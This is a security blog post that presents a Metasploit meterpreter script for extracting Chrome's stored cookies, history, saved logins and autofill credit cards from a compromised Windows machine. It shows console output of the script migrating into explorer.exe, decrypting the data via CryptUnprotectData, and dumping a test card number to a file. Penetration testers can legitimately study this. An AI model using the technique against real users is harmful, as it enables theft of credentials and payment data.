Meterpreter Script to extract chrome browser data


About two months ago, Jeremiah Grossman found a a nice way to exploit the form autofill feature of the Safari browser to extract the stored data.
A few days later Google announced that Chrome 6 will support form autofill including credit card information.

I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one.

The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse.

The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData:

“Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer.”

To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension.
To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges.
To get the data of the currently logged on user, the script allows to automatically migrate into the exlorer.exe process and, after the decryption is done, back into the original process.

The following shows the console output of the script:

meterpreter > getuid  
Server username: NT AUTHORITY\SYSTEM  
meterpreter > run enum_chrome -m  
[*] current PID is 1100. migrating into explorer.exe, PID=2916...  
[*] done.  
[*] running as user 'VM-WINXP\\test'...  
[*] extracting data for user 'test'...  
[*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'...  
[*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'...  
[*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'...  
[*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'...  
[*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'...  
[*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'...  
[*] creating file 'autofill.json'...  
[*] creating file 'autofill_profiles.json'...  
[*] creating file 'autofill\_credit\_cards.json'...  
[*] decrypting field 'card\_number\_encrypted'...  
[*] creating file 'cookies.json'...  
[*] creating file 'history.json'...  
[*] creating file 'logins.json'...  
[*] creating file 'bookmarks.json'...  
[*] creating file 'preferences.json'...  
[*] migrating back into PID=1100...  
[*] done.  
meterpreter >  

The file ‘autofill_credit_cards.json’ contains the following (the field “card_number_encrypted_decrypted” gets added by the script):

[  
  {  
    "label": "",  
    "verification\_code\_encrypted": "",  
    "unique_id": 1,  
    "expiration_year": 2010,  
    "card_number": "",  
    "shipping_address": "",  
    "type": "",  
    "card\_number\_encrypted": "\\u0001\\u0000\\u0000\\u0000Ð~L~\]ß\\u0001\\u0015Ñ\\u0011~Lz\\u0000ÀOÂ~Wë\\u0001\\u0000\\u0000\\u0000/\\u0006E\\u000eú«}N~LÁ\\u001bjÍ5\\u0004~\\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003f\\u0000\\u0000¨\\u0000\\u0000\\u0000\\u0010\\u0000\\u0000\\u0000Ú½\[~LökºíaÂAÕ\\u0013ÖoÚ\\u0000\\u0000\\u0000\\u0000\\u0004~@\\u0000\\u0000| \\u0000\\u0000\\u0000\\u0010\\u0000\\u0000\\u0000~Eî\\\uFÎrgé|i¬.\\u0002~P~I\\u0018\\u0000\\u0000\\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\\u0002m±\\u0014\\u0000\\u0000\\u0000Yö|#~\\~A°µ±ù~Zå·®\\u0007éJ~KyÓ",  
    "billing_address": "",  
    "expiration_month": 12,  
    "verification_code": "",  
    "name\_on\_card": "Test Card",  
    "card\_number\_encrypted_decrypted": "0123456789012345"  
  }  
]  

You can download the script here: http://github.com/svent/misc/blob/master/metasploit/enum_chrome.rb